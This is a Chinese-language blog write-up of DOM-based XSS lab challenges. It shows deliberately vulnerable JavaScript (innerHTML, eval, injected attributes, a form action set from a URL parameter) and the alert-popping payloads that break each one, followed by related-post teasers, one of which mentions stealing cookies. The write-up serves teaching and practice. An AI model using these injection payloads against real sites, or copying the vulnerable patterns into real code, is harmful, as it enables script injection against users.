XSS-DOM-1

最新推荐文章于 2025-12-05 16:47:40 发布
原创 最新推荐文章于 2025-12-05 16:47:40 发布 · 1k 阅读 · 14 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#xss #前端 #java

1 innerHTML

<body>
    <h2 id="spaghet"></h2>
</body>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>
</html>

1.1 innerHTML在JS是双向功能:

1.1.1获取对象的内容

如:<div id="aa">这是内容</div>

我们可以通过 document.getElementById(‘aa’).innerHTML 来获取id为aa的对象的内嵌内容;

1.1.2或向对象插入内容

也可以对某对象插入内容,如 document.getElementById(‘abc’).innerHTML=’这是被插入的内容’;
这样就能向id为abc的对象插入内容。

1.2 代码分析

spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"

这个innerHTML就是通过spaghet这个标签id锁定到html中的标签,然后再按照后面的=来表明输出的值

1.2.1 直接访问

直接访问发现是按照js中的代码直接拼接的,get传参的可变参数默认为somebody,那我们对他进行赋值来看看

1.2.2 赋值分析

直接就变成了1进行拼接,那我们试着输入恶意代码试一下(注意:innerHTML限制了<script>标签)

1.2.3 payload

test1.html?somebody=<img src=1 onerror=alert(1337)>

2

2.1 代码分析

首先jeff如果没传参默认为JEFFF,eval代码执行,先让ma接收上面的传参然后一秒钟过后将执行的ma赋值给h2,所以显示内容为 Ma name JEFFF

<body>
  <h2 id="maname"></h2>
</body>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

 

 2.2 payload

eval在js中也是命令执行,我们先闭合前面的双引号,但是我后面也有一个双引号,我可以直接注释掉

1 ?jeff=aaa";alert(1)//

2 ?jeff=111";alert(1);"

 2.2.1 代码调试

传参是这个,然后当我们再下一步的时候,发现直接弹1了,并没有执行下一步的延迟一秒

  1. eval 执行代码eval 会把字符串当 JS 代码执行,其中 ;alert(1)// 部分:
    • ; 分割语句,让 alert(1) 独立执行;
    • // 注释掉后面的多余引号(避免语法错误),最终触发 alert(1) 弹窗。

3 input标签

</head>
<body>
 <div id="uganda"></div>
</body>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>
</html>

3.1 代码分析

3.2 payload

test1.html?wey=a" autofocus onfocus="alert(1)

4 form表单

form表单通常我们需要注意他的这三个参数,action=“”这个是表示我应该接的后端的程序应该是那个php或者1后端的代码来接,enctype第一个是默认值,表示的是我输入的是文字,密码等,第二个"multipart/form-data是表示的文件上传

4.1 form属性

4.1.1 action

4.1.1.1 前端html

<body>

    <form action="test2.php" method="post">

        <input type="text" name="username" id="">

        <input type="submit" value="submit">

    </form>

</body>

4.1.1.2 后端test2.php

<?php

$username = $_POST['username'];

echo $username;

4.1.1.3 测试

先访问前端页面,因为get传参,看能不能传参到后端用来说明action属性的作用

提交后传到后端

4.1.1.4 当action=#

当为#的时候,会把页面提交到当前的页面不会进行跳转

4.2 漏洞源码

 <form id="ricardo" method="GET" >
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
</body>

<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>
</html>

4.2.1 javascript伪协议

 分析可知action可以接收javascript伪协议,执行其中的方法那么再回到4.2这个题本省就变的很简单了,直接给他赋值伪协议就行了

  <form action="javascript:alert(1)" method="post">
        <input type="text" name="username" id="">
        <input type="submit" value="submit">

4.3 payload

相当于我直接给action传参

test1.html?ricardo=javascript:alert(1)

Pikachu靶场-DOMxss/DOMxss-x
2401_83964264的博客
06-01 312
它主要是通过修改页面的DOM结构来注入并执行恶意脚本,而这些脚本并非来自服务器端的数据,而是源于用户的输入或页面本身的某些操作。- 寻找可利用的DOM节点:攻击者首先要找到目标页面中可被利用的DOM节点,这些节点通常是与用户输入相关的,比如 URL 参数、表单输入框等。- 对输入进行严格验证:对来自用户的输入,包括 URL 参数、表单数据等,进行严格的验证和过滤,确保其不包含恶意脚本。- 脚本执行:如果页面中的脚本没有对用户输入进行正确的验证和过滤,就可能导致恶意脚本被插入到DOM中并执行。
xss-labs靶场环境
09-17
XSS攻击分为三种主要类型:反射型XSS、存储型XSS和基于DOMXSS。在xss-labs靶场环境中,这些攻击类型都被以不同的关卡形式展现,每个关卡都模拟了一个潜在的真实世界场景。用户需要通过利用各种XSS漏洞来解决问题,...
pikachu靶场通关笔记09 XSS关卡05-DOMXSS-X
mooyuan的网络安全博客
06-02 1308
本系列为通过《pikachu靶场通关笔记》的XSS攻击关卡(共10关)渗透集合,通过对XSS关卡源码的代码审计找到真实原因,讲解XSS原理并进行渗透实践,本文为XSS关卡05-DOM-X型XSS的渗透部分,并对比04关DOMXSS,从源码分析和原理对比两者的区别。
CTFHUB-WEB-XSS-DOM反射
weixin_49539962的博客
08-08 505
但是在输入xss代码是要注意,我们可控的是“CTFHUB is very niubility”这句话,需要把这句话闭合后插入xss代码才能生效。和反射型是一样的,使用xss platform。
XSS---DOM破坏
zhoutong2323的博客
05-24 599
在HTML中,如果使用一些特定的属性名(如id或name)给DOM元素命名,这些属性会在全局作用域中创建同名的全局变量,指向对应的DOM元素。这种行为虽然有时可以方便地访问元素,但也会引发一些潜在的问题,特别是在元素的属性名与JavaScript全局对象的属性名冲突时,可能会破坏正常的DOM操作或脚本运行。这种现象被称为DOM破坏。
3.XSS-DOM型(基础和进阶)
愿听风成曲
06-22 454
不与后台服务器产生数据交互,通过前端dom节点形成的XSS漏洞。进行测试一下,输入111,会显示what do you see查看元素代码,看到What do you see根据前端页面语句进行编写弹窗攻击代码粘贴到搜索框中,点击clikc me在点击what do you see?就会弹出一个窗口,但是刷新一下就没有了前端的输入被DOM获取到了,通过DOM又在前端输出了,
皮卡丘存储型xssDOMxssDOMxss-x
Fly_Mojito的博客
05-30 1605
皮卡丘存储型xssDOMxssDOMxss-x
XSS-DOM
qq_51502737的博客
08-18 924
我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值,但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签,是一个HTMLElment对象。可以明显的看到这是个DOM XSS,用户的输入会构成一个新div元素的子结点,但在插入body之前会被移除所有的属性。但是对于大多数情况来说,我们可能更需要将其转换为一个可控的字符串类型,以便我们进行操作。最内层的svg先触发,然后再到下一层,而且是在DOM树构建完成以前就触发了相关事件。先注释掉过滤代码,此时正常弹窗。
CTFHub XSS通关3:DOMXSS-反射
mooyuan的网络安全博客
11-01 1187
本文详细讲解CTFHub的XSS-OM反射型关卡的渗透实战。首先通过代码审计发现前端使用innerHTML直接渲染用户输入,存在DOMXSS注入风险。随后利用闭合构造payload成功弹窗,验证了XSS注入存在。接着使用XSS平台生成窃取Cookie的恶意脚本,通过反射型XSS获取管理员Cookie。最终在XSS平台接收端成功获取到包含flag的Cookie值,完成渗透测试。
XSS--DOM破坏案例与靶场
weixin_63910421的博客
08-17 1412
靶场连接。
Static-DOM-XSS-Scanner 使用教程
gitblog_00389的博客
08-27 805
Static-DOM-XSS-Scanner 使用教程 项目介绍 Static-DOM-XSS-Scanner 是一个用 Python 编写的静态分析工具,旨在遍历指定目录下的所有 JavaScript 和 HTML 文件,并列出可能导致 DOM XSS 的所有可能的源和汇。扫描结束后,该工具会生成一个 HTML 报告。 项目快速启动 安装 首先,确保你已经安装了 Python 环境。然后,通过以...
练习二:靶场练习(xss-labs)
07-16
1. 反射型XSS攻击:攻击者通过构造特殊的URL,使得受害者在访问这个URL时,恶意代码被反射回浏览器执行。这种攻击通常针对单个用户,攻击载荷不会存储在服务器上。 2. 存储型XSS攻击:攻击者将恶意代码上传或提交到...
xss-labs-master.rar
05-09
根据脚本的执行环境,XSS被分为三种类型:反射型XSS、存储型XSSDOMXSS1. 反射型XSS:恶意代码通过URL参数传递,当用户点击链接或提交表单时触发。 2. 存储型XSS:恶意脚本被永久存储在服务器上,所有访问该...
xss-labs-master.zip(xss注入通关游戏/靶场)
03-21
3. **DOMXSS**:不涉及服务器,而是由于网页的DOM(Document Object Model)解析不当,导致恶意代码在用户的浏览器中执行。 **XSS攻击原理** XSS攻击通常通过诱使用户点击含有恶意脚本的链接,或者提交包含恶意...
xss-labs-master源码
07-06
例如,"level9.php"可能涉及到DOM-based XSS,"level13.php"可能涉及存储型XSS,每个级别都会引入不同的攻击场景和技术。 最后,"level6.php"到"level7.php"等文件代表了难度逐渐升级的过程,学习者需要掌握不同...
springbpoot项目,富文本,xss脚本攻击防护,jsoup
kkddqq1121的博客
12-05 422
XSS(跨站脚本攻击)是一种常见的网络安全漏洞,攻击者通过注入恶意脚本窃取数据或破坏页面。本文介绍了反射型、存储型和DOMXSS的原理及示例,并提出了防御措施,包括输入过滤、CSP策略和HttpOnly Cookie。同时提供了Java工具类XssCleanUtils的实现代码,利用jsoup库清理富文本和简单文本内容,有效防范XSS攻击。最后展示了如何在Spring Boot控制器中应用该工具类过滤用户输入内容。
CTFHub XSS通关:XSS-过滤关键词 - 教程
最新发布
网络安全
12-05 340
XSS平台是一种专门用于跨站脚本攻击测试和安全研究的Web应用程序。它为安全研究人员和白帽子黑客提供模拟真实攻击的环境,用于演示和验证Web应用程序中的XSS注入风险。平台核心功能包括生成并管理各种XSS攻击载荷(Payload)、自动收集受害者浏览器的敏感信息(如Cookie、会话令牌、浏览器指纹等),并提供远程代码执行能力。该平台强调合法与授权使用,通常用于渗透测试、安全教学等,是Web安全领域重要的教育和研究工具。其主要组成部分如下所示。
React大模型网站-流式推送markdown转换问题以及开启 rehype-raw,rehype-sanitize,remark-gfm等插件的使用
m0_61998604的博客
12-04 1149
本文介绍了在React大模型网站中实现流式推送Markdown转换的方法,重点讲解了ReactMarkdown库及其配套插件的使用。主要内容包括:1)ReactMarkdown基础用法;2)通过rehype-raw插件支持HTML标签渲染;3)使用rehype-sanitize防止XSS攻击;4)利用remark-gfm支持GitHub风格的Markdown语法;5)给出了完整的流式渲染实现方案,包含SSE推送、内容累积和实时更新等关键技术。文章还提供了完整的代码示例,帮助开发者快速实现安全可靠的Markd
50、【Ubuntu】【Gitlab】拉出内网 Web 服务:http.server 单/多线程分析(二)
HIT_Weston的博客
12-04 1403
本文分析了Python的http.server模块在单线程和多线程模式下的性能表现。通过测试发现,单线程模式下(Python<3.7)并发请求会被阻塞,后发请求需要等待前一个请求完成;而多线程模式下(Python≥3.7)可以同时处理多个请求。作者通过slow_server.py脚本模拟耗时操作,使用time curl命令测试响应时间,验证了线程模型的差异。文章还指出Python 3.7是一个重要分水岭,官方将默认命令行服务器升级为多线程以提升用户体验。技术细节参考了CPython源码,并提供了Git
Xss-dom-based cross-site scripting
08-06
### DOM-Based XSS 攻击的原理 DOM-Based XSS 是一种特殊的跨站脚本攻击(XSS),其核心原理在于攻击者通过操纵文档对象模型(DOM)来注入恶意脚本。与传统的反射型或存储型 XSS 不同,DOM-Based XSS 的攻击过程完全发生在客户端,服务器端不会直接参与恶意脚本的注入或执行。攻击者通常通过构造恶意 URL,利用客户端 JavaScript 从 URL 中提取参数并动态修改页面内容的方式,将恶意代码注入到页面中。例如,当 JavaScript 从 URL 中获取参数并将其插入到页面中的某个 DOM 节点时,如果没有对输入进行适当的过滤或转义,攻击者就可以注入恶意脚本,从而在用户的浏览器中执行[^1]。 ### DOM-Based XSS 攻击的实现方式 DOM-Based XSS 的实现依赖于客户端脚本对 DOM 的操作。例如,JavaScript 可能会通过 `document.write()`、`innerHTML`、`eval()` 等方法将用户输入的数据直接插入到页面中。攻击者可以构造包含恶意代码的 URL,当用户访问该 URL 时,恶意代码会被执行。这种攻击通常不需要服务器端的响应,而是完全依赖于客户端脚本的处理逻辑。例如,攻击者可能构造一个 URL,如 `http://example.com/page?param=<script>alert('XSS')</script>`,如果页面中的 JavaScript 直接将 `param` 参数的值插入到 DOM 中,而没有进行任何安全处理,则会触发 XSS 攻击[^2]。 ### DOM-Based XSS 的防范措施 为了防范 DOM-Based XSS 攻击,开发人员需要采取一系列的安全措施。首先,避免直接将用户输入的数据插入到 DOM 中,尤其是在使用 `innerHTML`、`document.write()` 等方法时。如果必须使用这些方法,应对输入数据进行严格的过滤和转义处理。其次,可以使用内容安全策略(Content Security Policy, CSP),通过限制页面中可以执行的脚本来源,来防止恶意脚本的执行。此外,开发人员应尽量避免使用 `eval()`、`setTimeout()` 等可能执行动态代码的函数,或者在使用这些函数时确保输入数据是可信的。最后,对用户输入进行严格的验证和清理,确保输入数据不会包含任何潜在的恶意代码[^3]。 ### 示例代码 以下是一个简单的示例,展示如何通过 JavaScript 安全地处理用户输入,以防止 DOM-Based XSS 攻击: ```javascript // 获取 URL 参数 function getParameterByName(name, url) { if (!url) url = window.location.href; name = name.replace(/[\[\]]/g, '\\$&'); var regex = new RegExp('[?&]' + name + '(=([^&#]*)|&|#|$)'), results = regex.exec(url); if (!results) return null; if (!results[2]) return ''; return decodeURIComponent(results[2].replace(/\+/g, ' ')); } // 安全地插入文本到 DOM 节点 function safeInsertText(elementId, text) { var element = document.getElementById(elementId); if (element) { // 使用 textContent 而不是 innerHTML 来避免 XSS element.textContent = text; } } // 获取 URL 中的参数并安全地插入到页面中 var userInput = getParameterByName('param'); safeInsertText('output', userInput); ``` 在这个示例中,`safeInsertText` 函数使用 `textContent` 属性而不是 `innerHTML`,这样可以确保输入数据不会被解析为 HTML,从而避免了潜在的 XSS 攻击。 ### 相关问题 1. DOM-Based XSS 与其他类型的 XSS 有何区别? 2. 如何在实际开发中检测和修复 DOM-Based XSS 漏洞? 3. 内容安全策略(CSP)是如何帮助防范 DOM-Based XSS 攻击的? 4. 有哪些工具可以帮助开发者测试和发现 DOM-Based XSS 漏洞? 5. 在现代 Web 开发中,有哪些最佳实践可以用来防止 DOM-Based XSS
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

fatsheep洋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值